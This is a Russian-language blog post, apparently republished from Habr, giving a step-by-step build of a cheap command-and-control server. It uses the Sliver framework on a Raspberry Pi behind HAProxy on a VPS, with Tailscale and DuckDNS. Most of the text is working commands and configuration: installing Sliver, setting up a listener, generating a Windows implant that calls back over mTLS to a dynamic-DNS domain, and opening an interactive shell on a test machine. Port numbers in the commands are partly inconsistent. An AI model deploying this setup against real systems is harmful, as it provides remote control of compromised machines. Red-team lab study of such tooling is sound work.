Всем привет!
Давно хотел поднять свой C2-сервер. Ну, чтобы как большие мальчики — с доменом, прокси, шифрованным туннелем. Но покупать VPS с 8GB RAM и платить за Cobalt Strike как-то жирновато. Решил: будет малинка.
ВНИМАНИЕ : Эта статья предназначена для ознакомления начинающим исследователям в области кибербезопасности. Я не буду тут показывать как обходить защиту windows и какие либо системы обнаружения угроз . Перед загрузкой вредоносного файла я отключил защиту в windws.
Что взял из железа и софта
-
Raspberry Pi 4 (4GB). Валялась без дела.
-
SD-карта на 32GB.
-
Самый дешёвый VPS на 2GB за 4 евро в месяц. На нём — HAProxy.
-
Tailscale (бесплатно на 3 устройства).
-
Sliver — открытая альтернатива Cobalt Strike.
-
DuckDNS — бесплатный динамический DNS.
АРХИТЕКТУРА :
Имплант → xxxxxxxx.duckdns.org:443 → VPS (HAProxy) → Tailscale → Pi4 (Sliver:31337)
Настройка Tailscale
На Pi и VPS:
bash
curl -fsSL https://tailscale.com/install.sh | shsudo tailscale up
После авторизации получаем IP:
-
Pi:
100.92.XX.XXX -
VPS:
100.106.XXX.XX
Проверяем связь:
bash
ping 100.92.XXX.XXX
Установка Sliver на Pi
Скачиваем бинарник:
bash
cd /tmpwget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-server_linux_arm64sudo install -m 755 sliver-server_linux_arm64 /usr/local/bin/sliver-server
Запускаем:
bash
sliver-server daemon --lhost 0.0.0.0 --lport 31338
Слушатель создаётся на порту 31337.
Настройка VPS (HAProxy)
Устанавливаем:
bash
sudo apt install -y haproxy
Конфиг /etc/haproxy/haproxy.cfg:
haproxy
global log /dev/log local0 maxconn 10000defaults mode tcp timeout connect 5s timeout client 60s timeout server 60sfrontend sliver_frontend bind :443 default_backend sliver_backendbackend sliver_backend server pi4 100.92.XXX.XXX:31337 check
Запускаем:
bash
sudo systemctl enable haproxysudo systemctl start haproxy
Настройка домена (DuckDNS)
Регистрируем домен xxxxxxxx.duckdns.org, привязываем к публичному IP VPS.
Проверяем:
bash
dig xxxxxxx.duckdns.org
Генерация импланта
В консоли Sliver создаём слушатель:
bash
http --domain xxxxxxxxx.duckdns.org --lhost 0.0.0.0 --lport 31337
Генерируем имплант:
bash
generate --mtls supersnusik.duckdns.org:443 --format exe --os windows --save /tmp/sliver.exe
Получение сессии
Переносим файл на тестовую Windows 10, запускаем.
В консоли Sliver:
bash
sessions
Результат:
text
[*] Session c5360843 UNIFORM_DISGUST - 100.106.xxx.xx:48190 (win10) - windows/amd64
Сессия получена. Работаем:
bash
sessions -i c5360843shell
Итог
Готовая C2-инфраструктура за один вечер.
Плюсы:
-
Бесплатное ПО (кроме VPS)
-
Управление с телефона через Tailscale + Termius
-
Возможность масштабирования
Расходы: 4€ в месяц за VPS.
Полезные команды
bash
# Запуск Sliversliver-server daemon --lhost 0.0.0.0 --lport 31338# Создание слушателяhttp --domain ваш-домен.duckdns.org --lhost 0.0.0.0 --lport 31337# Генерация имплантаgenerate --mtls ваш-домен.duckdns.org:443 --format exe --save /tmp/sliver.exe# Просмотр сессийsessions# Интерактивный shellsessions -i <id>shell
Заключение
Sliver — отличная бесплатная альтернатива коммерческим C2. Raspberry Pi + Tailscale + HAProxy дают надёжную и дешёвую инфраструктуру. Всё работает стабильно, сессии не теряются.
Вопросы и комментарии приветствуются.
ссылка на оригинал статьи https://habr.com/ru/articles/1024918/